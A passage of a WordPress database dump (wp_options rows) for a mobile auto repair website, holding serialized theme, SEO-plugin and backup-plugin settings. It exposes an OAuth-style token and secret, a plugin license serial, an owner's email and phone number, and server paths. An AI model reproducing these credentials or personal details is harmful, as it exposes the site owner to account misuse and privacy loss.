INSERT INTO `wp_options` VALUES("193", "_site_transient_update_core", "O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-4.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-4.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"4.1\";s:7:\"version\";s:3:\"4.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1423392865;s:15:\"version_checked\";s:3:\"4.1\";s:12:\"translations\";a:0:{}}", "yes");
INSERT INTO `wp_options` VALUES("195", "can_compress_scripts", "0", "yes");
INSERT INTO `wp_options` VALUES("198", "wpsupercache_gc_time", "1423359926", "yes");
INSERT INTO `wp_options` VALUES("199", "WPLANG", "", "yes");
INSERT INTO `wp_options` VALUES("204", "_site_transient_timeout_wporg_theme_feature_list", "1422933062", "yes");
INSERT INTO `wp_options` VALUES("205", "_site_transient_wporg_theme_feature_list", "a:4:{s:6:\"Colors\";a:15:{i:0;s:5:\"black\";i:1;s:4:\"blue\";i:2;s:5:\"brown\";i:3;s:4:\"gray\";i:4;s:5:\"green\";i:5;s:6:\"orange\";i:6;s:4:\"pink\";i:7;s:6:\"purple\";i:8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:6:\"Layout\";a:9:{i:0;s:12:\"fixed-layout\";i:1;s:12:\"fluid-layout\";i:2;s:17:\"responsive-layout\";i:3;s:10:\"one-column\";i:4;s:11:\"two-columns\";i:5;s:13:\"three-columns\";i:6;s:12:\"four-columns\";i:7;s:12:\"left-sidebar\";i:8;s:13:\"right-sidebar\";}s:8:\"Features\";a:20:{i:0;s:19:\"accessibility-ready\";i:1;s:8:\"blavatar\";i:2;s:10:\"buddypress\";i:3;s:17:\"custom-background\";i:4;s:13:\"custom-colors\";i:5;s:13:\"custom-header\";i:6;s:11:\"custom-menu\";i:7;s:12:\"editor-style\";i:8;s:21:\"featured-image-header\";i:9;s:15:\"featured-images\";i:10;s:15:\"flexible-header\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}}", "yes");
INSERT INTO `wp_options` VALUES("207", "theme_mods_twentyfourteen", "a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1422922346;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}", "yes");
INSERT INTO `wp_options` VALUES("208", "current_theme", "RockStar Local Lead Theme", "yes");
INSERT INTO `wp_options` VALUES("209", "theme_mods_RockStarLeadTheme-v2-4", "a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:11:\"custom_menu\";i:7;s:18:\"custom_footer_menu\";i:6;}}", "yes");
INSERT INTO `wp_options` VALUES("210", "theme_switched", "", "yes");
INSERT INTO `wp_options` VALUES("211", "key", "klho26hybi3s27", "yes");
INSERT INTO `wp_options` VALUES("218", "aioseop_options", "a:89:{s:12:\"aiosp_donate\";s:0:\"\";s:16:\"aiosp_home_title\";s:39:\"MOBILE AUTO REPAIR The Mobile Mechanics\";s:22:\"aiosp_home_description\";s:142:\"Mechanics that Come to You for All your Auto Repair and Vehicle Maintenance needs. Very Affordable Mobile Services for Cars-Trucks &amp; Vans.\";s:20:\"aiosp_togglekeywords\";s:1:\"0\";s:19:\"aiosp_home_keywords\";s:57:\"Mobile Mechanic, Mobile Auto Repair, The mobile Mechanics\";s:9:\"aiosp_can\";s:2:\"on\";s:20:\"aiosp_rewrite_titles\";s:1:\"1\";s:20:\"aiosp_force_rewrites\";s:1:\"1\";s:24:\"aiosp_use_original_title\";s:1:\"0\";s:16:\"aiosp_cap_titles\";s:2:\"on\";s:14:\"aiosp_cap_cats\";s:2:\"on\";s:23:\"aiosp_page_title_format\";s:27:\"%page_title% | %blog_title%\";s:23:\"aiosp_post_title_format\";s:27:\"%post_title% | %blog_title%\";s:27:\"aiosp_category_title_format\";s:31:\"%category_title% | %blog_title%\";s:25:\"aiosp_author_title_format\";s:23:\"%author% | %blog_title%\";s:22:\"aiosp_tag_title_format\";s:20:\"%tag% | %blog_title%\";s:25:\"aiosp_search_title_format\";s:23:\"%search% | %blog_title%\";s:24:\"aiosp_description_format\";s:13:\"%description%\";s:22:\"aiosp_404_title_format\";s:33:\"Nothing found for %request_words%\";s:18:\"aiosp_paged_format\";s:14:\" - Part %page%\";s:17:\"aiosp_enablecpost\";s:2:\"on\";s:19:\"aiosp_cpostadvanced\";s:1:\"0\";s:17:\"aiosp_cpostactive\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:18:\"aiosp_cpostnoindex\";s:0:\"\";s:19:\"aiosp_cpostnofollow\";s:0:\"\";s:17:\"aiosp_cposttitles\";s:0:\"\";s:21:\"aiosp_posttypecolumns\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:15:\"aiosp_admin_bar\";s:2:\"on\";s:23:\"aiosp_custom_menu_order\";s:2:\"on\";s:19:\"aiosp_google_verify\";s:0:\"\";s:17:\"aiosp_bing_verify\";s:0:\"\";s:22:\"aiosp_pinterest_verify\";s:0:\"\";s:22:\"aiosp_google_publisher\";s:0:\"\";s:28:\"aiosp_google_disable_profile\";s:0:\"\";s:20:\"aiosp_google_connect\";N;s:25:\"aiosp_google_analytics_id\";s:0:\"\";s:32:\"aiosp_ga_use_universal_analytics\";s:0:\"\";s:15:\"aiosp_ga_domain\";s:0:\"\";s:21:\"aiosp_ga_multi_domain\";s:0:\"\";s:22:\"aiosp_ga_exclude_users\";s:0:\"\";s:29:\"aiosp_ga_track_outbound_links\";s:0:\"\";s:20:\"aiosp_use_categories\";s:0:\"\";s:26:\"aiosp_use_tags_as_keywords\";s:2:\"on\";s:32:\"aiosp_dynamic_postspage_keywords\";s:2:\"on\";s:22:\"aiosp_category_noindex\";s:2:\"on\";s:26:\"aiosp_archive_date_noindex\";s:2:\"on\";s:28:\"aiosp_archive_author_noindex\";s:2:\"on\";s:18:\"aiosp_tags_noindex\";s:0:\"\";s:20:\"aiosp_search_noindex\";s:0:\"\";s:27:\"aiosp_generate_descriptions\";s:2:\"on\";s:33:\"aiosp_hide_paginated_descriptions\";s:0:\"\";s:20:\"aiosp_unprotect_meta\";s:0:\"\";s:14:\"aiosp_ex_pages\";s:0:\"\";s:20:\"aiosp_post_meta_tags\";s:0:\"\";s:20:\"aiosp_page_meta_tags\";s:0:\"\";s:21:\"aiosp_front_meta_tags\";s:0:\"\";s:20:\"aiosp_home_meta_tags\";s:0:\"\";s:12:\"aiosp_do_log\";s:0:\"\";s:23:\"aiosp_date_title_format\";s:21:\"%date% | %blog_title%\";s:11:\"aiosp_token\";s:45:\"4/7GTgpfHy5DZ_QdAB_On_BD0wBwq3kVHMBICEAEgpzY8\";s:12:\"aiosp_secret\";s:24:\"vBTV4vravtcL76QavgNrVVCw\";s:30:\"aiosp_no_paged_canonical_links\";s:0:\"\";s:31:\"aiosp_customize_canonical_links\";s:0:\"\";s:22:\"aiosp_can_set_protocol\";s:4:\"auto\";s:26:\"aiosp_archive_title_format\";s:30:\"%archive_title% | %blog_title%\";s:16:\"aiosp_cpostnoodp\";s:0:\"\";s:17:\"aiosp_cpostnoydir\";s:0:\"\";s:29:\"aiosp_google_sitelinks_search\";s:0:\"\";s:28:\"aiosp_google_author_advanced\";s:1:\"0\";s:28:\"aiosp_google_author_location\";a:6:{i:0;s:5:\"front\";i:1;s:4:\"post\";i:2;s:4:\"page\";i:3;s:10:\"attachment\";i:4;s:11:\"testimonial\";i:5;s:3:\"all\";}s:29:\"aiosp_google_enable_publisher\";s:2:\"on\";s:30:\"aiosp_google_specify_publisher\";s:0:\"\";s:25:\"aiosp_ga_advanced_options\";s:2:\"on\";s:21:\"aiosp_ga_addl_domains\";s:0:\"\";s:21:\"aiosp_ga_anonymize_ip\";s:0:\"\";s:28:\"aiosp_ga_display_advertising\";s:0:\"\";s:25:\"aiosp_ga_link_attribution\";s:0:\"\";s:27:\"aiosp_ga_enhanced_ecommerce\";s:0:\"\";s:17:\"aiosp_404_noindex\";s:0:\"\";s:23:\"aiosp_paginated_noindex\";s:0:\"\";s:24:\"aiosp_paginated_nofollow\";s:0:\"\";s:11:\"aiosp_noodp\";s:0:\"\";s:12:\"aiosp_noydir\";s:0:\"\";s:18:\"aiosp_skip_excerpt\";s:0:\"\";s:20:\"aiosp_run_shortcodes\";s:0:\"\";s:32:\"aiosp_dont_truncate_descriptions\";s:0:\"\";s:19:\"aiosp_schema_markup\";s:2:\"on\";s:29:\"aiosp_attachment_title_format\";s:27:\"%post_title% | %blog_title%\";s:30:\"aiosp_testimonial_title_format\";s:27:\"%post_title% | %blog_title%\";}", "yes");
INSERT INTO `wp_options` VALUES("223", "onpageseo_options", "a:69:{s:13:\"license_email\";s:17:\"keifersfl@aol.com\";s:14:\"license_serial\";s:17:\"1NH58530LY8884640\";s:17:\"old_license_email\";s:0:\"\";s:18:\"old_license_serial\";s:0:\"\";s:23:\"keyword_density_minimum\";s:3:\"2.0\";s:23:\"keyword_density_maximum\";s:3:\"5.5\";s:23:\"keyword_density_formula\";s:1:\"1\";s:28:\"description_meta_tag_maximum\";s:3:\"160\";s:19:\"post_content_length\";s:3:\"300\";s:20:\"title_length_minimum\";s:1:\"3\";s:20:\"title_length_maximum\";s:2:\"66\";s:14:\"posts_per_page\";s:2:\"20\";s:27:\"lsi_keyword_maximum_results\";s:2:\"50\";s:29:\"internal_links_posts_per_page\";s:2:\"10\";s:24:\"internal_images_per_page\";s:2:\"20\";s:15:\"request_timeout\";s:2:\"15\";s:18:\"connection_timeout\";s:3:\"100\";s:22:\"profile_queue_duration\";s:1:\"7\";s:10:\"bold_style\";s:1:\"b\";s:12:\"italic_style\";s:1:\"i\";s:15:\"underline_style\";s:1:\"u\";s:20:\"keyword_density_type\";s:4:\"post\";s:18:\"lsi_keyword_region\";s:5:\"us|en\";s:23:\"lsi_keyword_region_bing\";s:5:\"en-US\";s:16:\"lsi_keyword_sort\";s:9:\"frequency\";s:14:\"copyscape_role\";s:13:\"administrator\";s:19:\"password_activation\";s:11:\"deactivated\";s:28:\"google_direct_search_country\";s:3:\"com\";s:29:\"google_direct_search_language\";s:2:\"en\";s:29:\"google_direct_search_safemode\";s:6:\"active\";s:38:\"google_direct_search_proxy_server_type\";s:4:\"HTTP\";s:17:\"curation_template\";s:111:\"<p><strong><a href=\"[[SOURCE_URL]]\">[[TITLE]]</a></strong></p>\n<p>[[PUBLISHER]] [[DATE]]</p>\n<p>[[CONTENT]]</p>\";s:25:\"twitter_curation_template\";s:190:\"<p><img src=\"[[THUMBNAIL_URL]]\" class=\"alignleft\" /><strong>[[NAME]] <a href=\"[[USER_URL]]\">@[[SCREEN_NAME]]</a></strong></p><p>[[DATE]] - <a href=\"[[URL]]\">[[URL]]</a></p><p>[[CONTENT]]</p>\";s:18:\"password_file_path\";s:74:\"/home/themobilemech207/public_html/wp-content/plugins/easywpseo/cookie.txt\";s:10:\"stop_words\";s:5419:\"a\r\r\nable\r\r\nabout\r\r\nabove\r\r\nabroad\r\r\naccording\r\r\naccordingly\r\r\nacross\r\r\nactually\r\r\nafter\r\r\nafterwards\r\r\nagain\r\r\nagainst\r\r\nago\r\r\nahead\r\r\nain\'t\r\r\nall\r\r\nallow\r\r\nallows\r\r\nalmost\r\r\nalone\r\r\nalong\r\r\nalongside\r\r\nalready\r\r\nalso\r\r\nalthough\r\r\nalways\r\r\nam\r\r\namid\r\r\namidst\r\r\namong\r\r\namongst\r\r\nan\r\r\nand\r\r\nanother\r\r\nany\r\r\nanybody\r\r\nanyhow\r\r\nanyone\r\r\nanything\r\r\nanyway\r\r\nanyways\r\r\nanywhere\r\r\napart\r\r\nappear\r\r\nappreciate\r\r\nappropriate\r\r\nare\r\r\naren\'t\r\r\naround\r\r\nas\r\r\naside\r\r\nask\r\r\nasking\r\r\nassociated\r\r\nat\r\r\navailable\r\r\naway\r\r\nawfully\r\r\nback\r\r\nbackward\r\r\nbackwards\r\r\nbe\r\r\nbecame\r\r\nbecause\r\r\nbecome\r\r\nbecomes\r\r\nbecoming\r\r\nbeen\r\r\nbefore\r\r\nbeforehand\r\r\nbegin\r\r\nbehind\r\r\nbeing\r\r\nbelieve\r\r\nbelow\r\r\nbeside\r\r\nbesides\r\r\nbest\r\r\nbetter\r\r\nbetween\r\r\nbeyond\r\r\nboth\r\r\nbrief\r\r\nbut\r\r\nby\r\r\ncame\r\r\ncan\r\r\ncannot\r\r\ncant\r\r\ncan\'t\r\r\ncaption\r\r\ncause\r\r\ncauses\r\r\ncertain\r\r\ncertainly\r\r\nchanges\r\r\nclearly\r\r\nc\'mon\r\r\nco\r\r\nco.\r\r\ncom\r\r\ncome\r\r\ncomes\r\r\nconcerning\r\r\nconsequently\r\r\nconsider\r\r\nconsidering\r\r\ncontain\r\r\ncontaining\r\r\ncontains\r\r\ncorresponding\r\r\ncould\r\r\ncouldn\'t\r\r\ncourse\r\r\ncurrently\r\r\ndare\r\r\ndaren\'t\r\r\ndefinitely\r\r\ndescribed\r\r\ndespite\r\r\ndid\r\r\ndidn\'t\r\r\ndifferent\r\r\ndirectly\r\r\ndo\r\r\ndoes\r\r\ndoesn\'t\r\r\ndoing\r\r\ndone\r\r\ndon\'t\r\r\ndown\r\r\ndownwards\r\r\nduring\r\r\neach\r\r\nedu\r\r\neg\r\r\neight\r\r\neighty\r\r\neither\r\r\nelse\r\r\nelsewhere\r\r\nend\r\r\nending\r\r\nenough\r\r\nentirely\r\r\nespecially\r\r\net\r\r\netc\r\r\neven\r\r\never\r\r\nevermore\r\r\nevery\r\r\neverybody\r\r\neveryone\r\r\neverything\r\r\neverywhere\r\r\nex\r\r\nexactly\r\r\nexample\r\r\nexcept\r\r\nfairly\r\r\nfar\r\r\nfarther\r\r\nfew\r\r\nfewer\r\r\nfifth\r\r\nfirst\r\r\nfive\r\r\nfollowed\r\r\nfollowing\r\r\nfollows\r\r\nfor\r\r\nforever\r\r\nformer\r\r\nformerly\r\r\nforth\r\r\nforward\r\r\nfound\r\r\nfour\r\r\nfrom\r\r\nfurther\r\r\nfurthermore\r\r\nget\r\r\ngets\r\r\ngetting\r\r\ngiven\r\r\ngives\r\r\ngo\r\r\ngoes\r\r\ngoing\r\r\ngone\r\r\ngot\r\r\ngotten\r\r\ngreetings\r\r\nhad\r\r\nhadn\'t\r\r\nhalf\r\r\nhappens\r\r\nhardly\r\r\nhas\r\r\nhasn\'t\r\r\nhave\r\r\nhaven\'t\r\r\nhaving\r\r\nhe\r\r\nhe\'d\r\r\nhe\'ll\r\r\nhello\r\r\nhelp\r\r\nhence\r\r\nher\r\r\nhere\r\r\nhereafter\r\r\nhereby\r\r\nherein\r\r\nhere\'s\r\r\nhereupon\r\r\nhers\r\r\nherself\r\r\nhe\'s\r\r\nhi\r\r\nhim\r\r\nhimself\r\r\nhis\r\r\nhither\r\r\nhopefully\r\r\nhow\r\r\nhowbeit\r\r\nhowever\r\r\nhundred\r\r\ni\r\r\ni\'d\r\r\nie\r\r\nif\r\r\nignored\r\r\ni\'ll\r\r\ni\'m\r\r\nimmediate\r\r\nin\r\r\ninasmuch\r\r\ninc\r\r\ninc.\r\r\nindeed\r\r\nindicate\r\r\nindicated\r\r\nindicates\r\r\ninner\r\r\ninside\r\r\ninsofar\r\r\ninstead\r\r\ninto\r\r\ninward\r\r\nis\r\r\nisn\'t\r\r\nit\r\r\nit\'d\r\r\nit\'ll\r\r\nits\r\r\nit\'s\r\r\nitself\r\r\ni\'ve\r\r\njust\r\r\nk\r\r\nkeep\r\r\nkeeps\r\r\nkept\r\r\nknow\r\r\nknown\r\r\nknows\r\r\nlast\r\r\nlately\r\r\nlater\r\r\nlatter\r\r\nlatterly\r\r\nleast\r\r\nless\r\r\nlest\r\r\nlet\r\r\nlet\'s\r\r\nlike\r\r\nliked\r\r\nlikely\r\r\nlikewise\r\r\nlittle\r\r\nlook\r\r\nlooking\r\r\nlooks\r\r\nlow\r\r\nlower\r\r\nltd\r\r\nmade\r\r\nmainly\r\r\nmake\r\r\nmakes\r\r\nmany\r\r\nmay\r\r\nmaybe\r\r\nmayn\'t\r\r\nme\r\r\nmean\r\r\nmeantime\r\r\nmeanwhile\r\r\nmerely\r\r\nmight\r\r\nmightn\'t\r\r\nmine\r\r\nminus\r\r\nmiss\r\r\nmore\r\r\nmoreover\r\r\nmost\r\r\nmostly\r\r\nmr\r\r\nmrs\r\r\nmuch\r\r\nmust\r\r\nmustn\'t\r\r\nmy\r\r\nmyself\r\r\nname\r\r\nnamely\r\r\nnear\r\r\nnearly\r\r\nnecessary\r\r\nneed\r\r\nneedn\'t\r\r\nneeds\r\r\nneither\r\r\nnever\r\r\nneverf\r\r\nneverless\r\r\nnevertheless\r\r\nnew\r\r\nnext\r\r\nnine\r\r\nninety\r\r\nno\r\r\nnobody\r\r\nnon\r\r\nnone\r\r\nnonetheless\r\r\nnoone\r\r\nno-one\r\r\nnor\r\r\nnormally\r\r\nnot\r\r\nnothing\r\r\nnotwithstanding\r\r\nnovel\r\r\nnow\r\r\nnowhere\r\r\no\r\r\nobviously\r\r\nof\r\r\noff\r\r\noften\r\r\noh\r\r\nok\r\r\nokay\r\r\nold\r\r\non\r\r\nonce\r\r\none\r\r\nones\r\r\none\'s\r\r\nonly\r\r\nonto\r\r\nopposite\r\r\nor\r\r\nother\r\r\nothers\r\r\notherwise\r\r\nought\r\r\noughtn\'t\r\r\nour\r\r\nours\r\r\nourselves\r\r\nout\r\r\noutside\r\r\nover\r\r\noverall\r\r\nown\r\r\nparticular\r\r\nparticularly\r\r\npast\r\r\nper\r\r\nperhaps\r\r\nplaced\r\r\nplease\r\r\nplus\r\r\npossible\r\r\npresumably\r\r\nprobably\r\r\nprovided\r\r\nprovides\r\r\nque\r\r\nquite\r\r\nrather\r\r\nrd\r\r\nre\r\r\nreally\r\r\nreasonably\r\r\nrecent\r\r\nrecently\r\r\nregarding\r\r\nregardless\r\r\nregards\r\r\nrelatively\r\r\nrespectively\r\r\nright\r\r\nround\r\r\nsaid\r\r\nsame\r\r\nsaw\r\r\nsay\r\r\nsaying\r\r\nsays\r\r\nsecond\r\r\nsecondly\r\r\nsee\r\r\nseeing\r\r\nseem\r\r\nseemed\r\r\nseeming\r\r\nseems\r\r\nseen\r\r\nself\r\r\nselves\r\r\nsensible\r\r\nsent\r\r\nserious\r\r\nseriously\r\r\nseven\r\r\nseveral\r\r\nshall\r\r\nshan\'t\r\r\nshe\r\r\nshe\'d\r\r\nshe\'ll\r\r\nshe\'s\r\r\nshould\r\r\nshouldn\'t\r\r\nsince\r\r\nsix\r\r\nso\r\r\nsome\r\r\nsomebody\r\r\nsomeday\r\r\nsomehow\r\r\nsomeone\r\r\nsomething\r\r\nsometime\r\r\nsometimes\r\r\nsomewhat\r\r\nsomewhere\r\r\nsoon\r\r\nsorry\r\r\nspecified\r\r\nspecify\r\r\nspecifying\r\r\nstill\r\r\nsub\r\r\nsuch\r\r\nsup\r\r\nsure\r\r\ntake\r\r\ntaken\r\r\ntaking\r\r\ntell\r\r\ntends\r\r\nth\r\r\nthan\r\r\nthank\r\r\nthanks\r\r\nthanx\r\r\nthat\r\r\nthat\'ll\r\r\nthats\r\r\nthat\'s\r\r\nthat\'ve\r\r\nthe\r\r\ntheir\r\r\ntheirs\r\r\nthem\r\r\nthemselves\r\r\nthen\r\r\nthence\r\r\nthere\r\r\nthereafter\r\r\nthereby\r\r\nthere\'d\r\r\ntherefore\r\r\ntherein\r\r\nthere\'ll\r\r\nthere\'re\r\r\ntheres\r\r\nthere\'s\r\r\nthereupon\r\r\nthere\'ve\r\r\nthese\r\r\nthey\r\r\nthey\'d\r\r\nthey\'ll\r\r\nthey\'re\r\r\nthey\'ve\r\r\nthing\r\r\nthings\r\r\nthink\r\r\nthird\r\r\nthirty\r\r\nthis\r\r\nthorough\r\r\nthoroughly\r\r\nthose\r\r\nthough\r\r\nthree\r\r\nthrough\r\r\nthroughout\r\r\nthru\r\r\nthus\r\r\ntill\r\r\nto\r\r\ntogether\r\r\ntoo\r\r\ntook\r\r\ntoward\r\r\ntowards\r\r\ntried\r\r\ntries\r\r\ntruly\r\r\ntry\r\r\ntrying\r\r\ntwice\r\r\ntwo\r\r\nu\r\r\nun\r\r\nunder\r\r\nunderneath\r\r\nundoing\r\r\nunfortunately\r\r\nunless\r\r\nunlike\r\r\nunlikely\r\r\nuntil\r\r\nunto\r\r\nup\r\r\nupon\r\r\nupwards\r\r\nus\r\r\nuse\r\r\nused\r\r\nuseful\r\r\nuses\r\r\nusing\r\r\nusually\r\r\nvalue\r\r\nvarious\r\r\nversus\r\r\nvery\r\r\nvia\r\r\nviz\r\r\nvs\r\r\nwant\r\r\nwants\r\r\nwas\r\r\nwasn\'t\r\r\nway\r\r\nwe\r\r\nwe\'d\r\r\nwelcome\r\r\nwell\r\r\nwe\'ll\r\r\nwent\r\r\nwere\r\r\nwe\'re\r\r\nweren\'t\r\r\nwe\'ve\r\r\nwhat\r\r\nwhatever\r\r\nwhat\'ll\r\r\nwhat\'s\r\r\nwhat\'ve\r\r\nwhen\r\r\nwhence\r\r\nwhenever\r\r\nwhere\r\r\nwhereafter\r\r\nwhereas\r\r\nwhereby\r\r\nwherein\r\r\nwhere\'s\r\r\nwhereupon\r\r\nwherever\r\r\nwhether\r\r\nwhich\r\r\nwhichever\r\r\nwhile\r\r\nwhilst\r\r\nwhither\r\r\nwho\r\r\nwho\'d\r\r\nwhoever\r\r\nwhole\r\r\nwho\'ll\r\r\nwhom\r\r\nwhomever\r\r\nwho\'s\r\r\nwhose\r\r\nwhy\r\r\nwill\r\r\nwilling\r\r\nwish\r\r\nwith\r\r\nwithin\r\r\nwithout\r\r\nwonder\r\r\nwon\'t\r\r\nwould\r\r\nwouldn\'t\r\r\nyes\r\r\nyet\r\r\nyou\r\r\nyou\'d\r\r\nyou\'ll\r\r\nyour\r\r\nyou\'re\r\r\nyours\r\r\nyourself\r\r\nyourselves\r\r\nyou\'ve\r\r\nzero\";s:12:\"title_factor\";s:1:\"1\";s:22:\"title_beginning_factor\";s:1:\"1\";s:19:\"title_ending_factor\";s:1:\"1\";s:18:\"title_words_factor\";s:1:\"1\";s:23:\"title_characters_factor\";s:1:\"1\";s:10:\"url_factor\";s:1:\"1\";s:23:\"description_meta_factor\";s:1:\"1\";s:29:\"description_chars_meta_factor\";s:1:\"1\";s:33:\"description_beginning_meta_factor\";s:1:\"1\";s:20:\"keywords_meta_factor\";s:1:\"1\";s:9:\"h1_factor\";s:1:\"1\";s:19:\"h1_beginning_factor\";s:1:\"1\";s:9:\"h2_factor\";s:1:\"1\";s:9:\"h3_factor\";s:1:\"1\";s:20:\"content_words_factor\";s:1:\"1\";s:25:\"content_kw_density_factor\";s:1:\"1\";s:20:\"content_first_factor\";s:1:\"1\";s:18:\"content_alt_factor\";s:1:\"1\";s:19:\"content_bold_factor\";s:1:\"1\";s:21:\"content_italic_factor\";s:1:\"1\";s:24:\"content_underline_factor\";s:1:\"1\";s:28:\"content_external_link_factor\";s:1:\"1\";s:28:\"content_internal_link_factor\";s:1:\"1\";s:19:\"content_last_factor\";s:1:\"1\";s:19:\"twitter_card_factor\";s:1:\"1\";s:17:\"open_graph_factor\";s:1:\"1\";s:18:\"dublin_core_factor\";s:1:\"1\";s:17:\"shortcode_support\";s:1:\"1\";s:15:\"unicode_support\";i:1;s:16:\"profile_settings\";s:1:\"1\";s:13:\"factor_update\";i:1;s:19:\"posts_columns_score\";s:1:\"1\";s:21:\"posts_columns_keyword\";s:1:\"1\";s:14:\"columns_update\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("224", "onpageseo_update_check", "a:4:{s:12:\"last_checked\";s:19:\"2015-02-03 20:16:55\";s:14:\"latest_version\";s:7:\"1.9.1.5\";s:12:\"download_url\";s:88:\"http://www.easywpseo.com/download/?email=%email_address%&serial=%serial_number%&direct=1\";s:16:\"after_plugin_row\";s:207:\"There is a new version of %plugin-name% available. <a href=\"%download_url%\">Download version %latest-version% here</a> or <a href=\"admin.php?page=onpageseo-settings&action=upgrade\">upgrade automatically</a>.\";}", "yes");
INSERT INTO `wp_options` VALUES("228", "plg_alt_stylesheet", "blue", "yes");
INSERT INTO `wp_options` VALUES("229", "plg_alt_background", "blue", "yes");
INSERT INTO `wp_options` VALUES("230", "plg_sidebar_contact_img", "blue-male", "yes");
INSERT INTO `wp_options` VALUES("231", "plg_top_bar_text", "The Mobile Mechanics", "yes");
INSERT INTO `wp_options` VALUES("232", "plg_header_image", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Header.png", "yes");
INSERT INTO `wp_options` VALUES("233", "plg_email_address", "support@.themobilemechanics.org", "yes");
INSERT INTO `wp_options` VALUES("234", "plg_ccemail_address", "Keifersfl@aol.com", "yes");
INSERT INTO `wp_options` VALUES("235", "plg_phone_number", "(813) 361-1384", "yes");
INSERT INTO `wp_options` VALUES("236", "plg_form_heading", "Request  a Call Back", "yes");
INSERT INTO `wp_options` VALUES("237", "plg_form_add", "Your Project", "yes");
INSERT INTO `wp_options` VALUES("238", "plg_video", "C8UIQczfF6Q", "yes");
INSERT INTO `wp_options` VALUES("239", "plg_video_text", "", "yes");
INSERT INTO `wp_options` VALUES("240", "plg_list_1", "", "yes");
INSERT INTO `wp_options` VALUES("241", "plg_list_2", "", "yes");
INSERT INTO `wp_options` VALUES("242", "plg_list_3", "", "yes");
INSERT INTO `wp_options` VALUES("243", "plg_list_4", "", "yes");
INSERT INTO `wp_options` VALUES("244", "plg_list_5", "", "yes");
INSERT INTO `wp_options` VALUES("245", "plg_list_6", "", "yes");
INSERT INTO `wp_options` VALUES("246", "plg_list_7", "", "yes");
INSERT INTO `wp_options` VALUES("247", "plg_list_8", "", "yes");
INSERT INTO `wp_options` VALUES("248", "plg_list_9", "", "yes");
INSERT INTO `wp_options` VALUES("249", "plg_list_10", "", "yes");
INSERT INTO `wp_options` VALUES("250", "plg_facebook_id", "", "yes");
INSERT INTO `wp_options` VALUES("251", "plg_twitter_id", "", "yes");
INSERT INTO `wp_options` VALUES("252", "plg_email_override", "", "yes");
INSERT INTO `wp_options` VALUES("253", "plg_copyright", "", "yes");
INSERT INTO `wp_options` VALUES("254", "plg_analytics_code", "", "yes");
INSERT INTO `wp_options` VALUES("255", "duplicator_settings", "a:10:{s:7:\"version\";s:6:\"0.5.12\";s:18:\"uninstall_settings\";b:1;s:15:\"uninstall_files\";b:1;s:16:\"uninstall_tables\";b:1;s:13:\"package_debug\";b:0;s:17:\"package_mysqldump\";b:0;s:22:\"package_mysqldump_path\";s:0:\"\";s:24:\"package_phpdump_qrylimit\";s:3:\"100\";s:17:\"package_zip_flush\";b:0;s:20:\"storage_htaccess_off\";b:0;}", "yes");
INSERT INTO `wp_options` VALUES("256", "duplicator_version_plugin", "0.5.12", "yes");
INSERT INTO `wp_options` VALUES("257", "duplicator_ui_view_state", "a:1:{s:14:\"dup-wpnotice01\";b:1;}", "yes");
INSERT INTO `wp_options` VALUES("258", "duplicator_package_active", "O:11:\"DUP_Package\":16:{s:2:\"ID\";N;s:4:\"Name\";s:37:\"20150203_mobilemechanicstallahasseefl\";s:4:\"Hash\";s:29:\"54d78ac05c5471857150208161144\";s:8:\"NameHash\";s:67:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144\";s:7:\"Version\";s:6:\"0.5.12\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:51:\"/home/themobilemech207/public_html/wp-snapshots/tmp\";s:8:\"StoreURL\";s:55:\"http://tallahassee.themobilemechanics.org/wp-snapshots/\";s:8:\"ScanFile\";s:77:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144_scan.json\";s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:7:\"Archive\";O:11:\"DUP_Archive\":17:{s:10:\"FilterDirs\";s:0:\"\";s:10:\"FilterExts\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"File\";N;s:6:\"Format\";s:3:\"ZIP\";s:7:\"PackDir\";s:34:\"/home/themobilemech207/public_html\";s:4:\"Size\";i:0;s:12:\"WarnFileSize\";a:0:{}s:12:\"WarnFileName\";a:0:{}s:4:\"Dirs\";a:0:{}s:5:\"Files\";a:0:{}s:5:\"Links\";a:0:{}s:8:\"OmitDirs\